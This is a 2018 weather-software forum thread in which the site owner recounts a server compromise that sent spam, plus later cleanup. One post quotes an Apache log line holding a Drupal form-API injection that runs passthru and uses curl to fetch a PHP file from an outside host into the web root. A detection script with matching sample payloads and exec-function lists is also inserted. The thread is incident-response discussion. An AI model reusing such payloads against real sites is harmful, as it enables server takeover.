Welcome to the new home of the Cumulus Support forum.

Latest Cumulus release v1.9.4 (build 1099) - Nov 28 2014
Latest Cumulus MX release - v3.0.0 build 3044 7 December 2018. See the Wiki for download

Site going down.

Talk about anything that doesn't fit elsewhere - PLEASE don't put Cumulus queries in here!
ConligWX
Posts: 736
Joined: Mon 19 May 2014 10:45 pm
Weather Station: Davis Vantage Pro2 Plus
Operating System: MeteoBridge Nano SD
Location: Bangor, NI

Re: Site going down.

Post by ConligWX » Tue 09 Oct 2018 8:19 pm

Let's hope you've fixed it so you and the wife can get on with the holiday.
Regards Simon

https://www.conligwx.org
https://twitter.com/conligwx
Davis Vantage Pro2 Plus - Meteobridge Nano SD + Saratoga/PWS Templates

Matt.j5b
Posts: 436
Joined: Mon 28 Nov 2011 2:13 am
Weather Station: Davis VP2 DFARS+La Crosse WS2306
Operating System: Windows 10 64 Bit
Location: Ferny Grove, Brisbane, Australia

Re: Site going down.

Post by Matt.j5b » Tue 09 Oct 2018 8:36 pm

It's good to hear you have been making progress and thanks for trying to resolve this. It's a horrible shame how low some people are in what they do to cause trouble. Hopefully you have fixed the issue and you do enjoy your holiday. :)
Regards, Matt of Brisbane, Australia
Ferny Grove Weather
Cumulus MX testing

jlmr731
Posts: 118
Joined: Sat 27 Aug 2016 12:11 am
Weather Station: Davis vantage pro 2
Operating System: Debian
Location: Youngstown, Ohio

Re: Site going down.

Post by jlmr731 » Wed 10 Oct 2018 2:19 am

Any chance that you can give us a little insight on the script they used to keep it running, or what one should look for?
May be helpful for others to know what to do if they have this problem, to stop these script kiddies.

Thanks Steve for your hard work getting this problem resolved while on holiday.

steve
Cumulus Author
Posts: 26714
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France

Re: Site going down.

Post by steve » Wed 10 Oct 2018 2:58 pm

I don't really have much to offer, I just deleted installations of things like Wordpress and Drupal which hadn't been kept up to date. This entry (and others like it) in the apache log looked suspicious (thanks go to Ken for suggesting that a suspicious POST was something to look for) and from googling it appeared to be related to a Drupal vulnerability:

85.126.200.23 - - [08/Oct/2018:04:43:19 +0200] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/.htaccess+htaccessx;curl+-o+sites/default/api.php+'http://saint-laurent-gorre.fr/_inc/_phpThumb/demit.aff' HTTP/1.1" 200 8120 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36"

I realised that I had been wrong about the spam not coming from the server when I had turned off all the legitimate sources of email and there were still smtp connections being made. I also had a number of (supposedly) exim processes running, and I don't have exim installed. Some malware disguises itself as exim, amongst other things.

It makes you realise that Linux is no more secure than Windows unless you really know what you're doing and keep on top of vulnerability notices and keep everything up to date. Although I believe this incident was my fault for not keeping things up to date, I do now regret allowing some users to install things like PHPBB and Wordpress.
Steve
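The kind of check Ken suggested above (look for a suspicious POST) can be automated. The script below is an added illustration, not something from this thread or from Steve's server: it parses Apache combined-format lines and flags requests whose query parameters carry Drupal render-array keys (`#post_render`, `#markup`, ...) pointing at a PHP exec function. The log lines, IPs and the `SAMPLE_LOG` text are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Drupal render-array keys that never belong in a legitimate form submission.
RENDER_KEYS = ("#post_render", "#pre_render", "#markup", "#type", "#lazy_builder", "#access_callback")
# PHP functions an attacker typically names as the injected callback.
EXEC_FUNCS = ("passthru", "exec", "system", "shell_exec", "popen", "assert", "eval")

# Constructed sample: one injection attempt (192.0.2.10) and two benign requests.
SAMPLE_LOG = """\
192.0.2.10 - - [08/Oct/2018:04:43:19 +0200] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=id HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Oct/2018:04:45:02 +0200] "GET /?q=user/password HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
198.51.100.8 - - [08/Oct/2018:04:46:11 +0200] "POST /?q=user/password&name=alice HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def suspicious_drupal_post(line):
    """Return a finding dict when the request's parameters contain Drupal render-array
    keys (the hallmark of the form-API injection), otherwise None."""
    rec = parse_line(line)
    if rec is None:
        return None
    query = rec["target"].partition("?")[2]          # everything after the first '?'
    params = parse_qsl(query, keep_blank_values=True)  # percent-decodes %23 -> '#'
    render_keys = sorted({k for key, _ in params for k in RENDER_KEYS if k in key})
    if not render_keys:
        return None
    exec_funcs = sorted({v for _, v in params if v in EXEC_FUNCS})
    return {"ip": rec["ip"], "time": rec["time"], "method": rec["method"],
            "render_keys": render_keys, "exec_funcs": exec_funcs}

def scan(log_text):
    """Run the check over every line of a log and collect the findings."""
    return [f for f in map(suspicious_drupal_post, log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```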

RayProudfoot
Posts: 2632
Joined: Wed 06 May 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England

Re: Site going down.

Post by RayProudfoot » Wed 10 Oct 2018 4:05 pm

Steve, thanks for the update. Way over my head I’m afraid. Does this now mean the malware is no more and the hosting company have removed the threat of closure?
Cheers,
Ray, Cheshire.


steve
Cumulus Author
Posts: 26714
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France

Re: Site going down.

Post by steve » Wed 10 Oct 2018 4:54 pm

I believe the malware is no more, although there is still a slight oddity to be explained, but this apparently is not doing any harm. Hetzner are going to review after two days. After which I will re-enable the outgoing smtp port so that mail from the forum will start working again, and hopefully the server will eventually stop being flagged as a risk - I’ve noticed in the mail logs that some destinations are refusing mail from us.
Steve

RayProudfoot
Posts: 2632
Joined: Wed 06 May 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England

Re: Site going down.

Post by RayProudfoot » Wed 10 Oct 2018 9:54 pm

Thanks Steve. I’m breathing a huge sigh of relief. Things looked very bleak over the weekend but you’ve done a great job in sorting things out aided by Ken. :clap:
Cheers,
Ray, Cheshire.


hornychz
Posts: 7
Joined: Mon 11 May 2015 3:54 pm
Weather Station: WeatherDuino Pro2
Operating System: Raspbian Wheezy
Location: Brandys nad Labem - Stara Boleslav, Czech republic

Re: Site going down.

Post by hornychz » Thu 11 Oct 2018 8:11 am

:clap: :)

ConligWX
Posts: 736
Joined: Mon 19 May 2014 10:45 pm
Weather Station: Davis Vantage Pro2 Plus
Operating System: MeteoBridge Nano SD
Location: Bangor, NI

Re: Site going down.

Post by ConligWX » Thu 11 Oct 2018 11:34 am

It sounds more like a PHP injection vulnerability than Linux itself being hacked. PHP CMSs are plagued with security holes, and only by updating them when updates are released can you try to secure a site.

Steve, on that note you would be advised to update phpBB. You're running a version that needs updating ;)

pm sent...
Regards Simon

https://www.conligwx.org
https://twitter.com/conligwx
Davis Vantage Pro2 Plus - Meteobridge Nano SD + Saratoga/PWS Templates

RayProudfoot
Posts: 2632
Joined: Wed 06 May 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England

Re: Site going down.

Post by RayProudfoot » Thu 11 Oct 2018 12:00 pm

Not sure if this is related or not, but when I log into my account with FileZilla it notifies me the certificate has expired. Is that a potential area of concern?
Cheers,
Ray, Cheshire.


steve
Cumulus Author
Posts: 26714
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France

Re: Site going down.

Post by steve » Thu 11 Oct 2018 1:05 pm

I created a dummy certificate when I enabled secure ftp on the server when testing the code I added to Cumulus MX. Filezilla will try to use secure ftp in preference and will get the dummy certificate. I suppose I should really disable secure ftp on the server, I get asked about this regularly. The last time I was asked, I forgot how it was supposed to work, and broke the server for a short time trying to fix something that didn’t need fixing!

At some point I may look into getting a proper certificate, now that they can be had for free.

(Short answer: no :) )
Steve

RayProudfoot
Posts: 2632
Joined: Wed 06 May 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England

Re: Site going down.

Post by RayProudfoot » Thu 11 Oct 2018 3:45 pm

Thanks Steve. Not a major issue for me but given recent events thought it worth asking. I imagine you're feeling a lot better now! Time for a beer or two! :D
Cheers,
Ray, Cheshire.


steve
Cumulus Author
Posts: 26714
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France

Re: Site going down.

Post by steve » Mon 15 Oct 2018 2:41 pm

The spam has started again. I have blocked outgoing traffic on port 25 and will investigate when I get home, I've had enough of this for now.

I strongly advise anyone whose web site is on this server to start making alternative arrangements. I will refund any payments made, pro-rata, on request to steve@nybbles.co.uk
Steve

saratogaWX
Posts: 912
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA

Re: Site going down.

Post by saratogaWX » Mon 15 Oct 2018 4:21 pm

Ouch. I’ll be glad to analyze the logs again, Steve.

Best regards,
Ken

steve
Cumulus Author
Posts: 26714
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France

Re: Site going down.

Post by steve » Mon 15 Oct 2018 4:29 pm

Thanks, Ken, when I get chance I’ll zip them up for you.
Steve
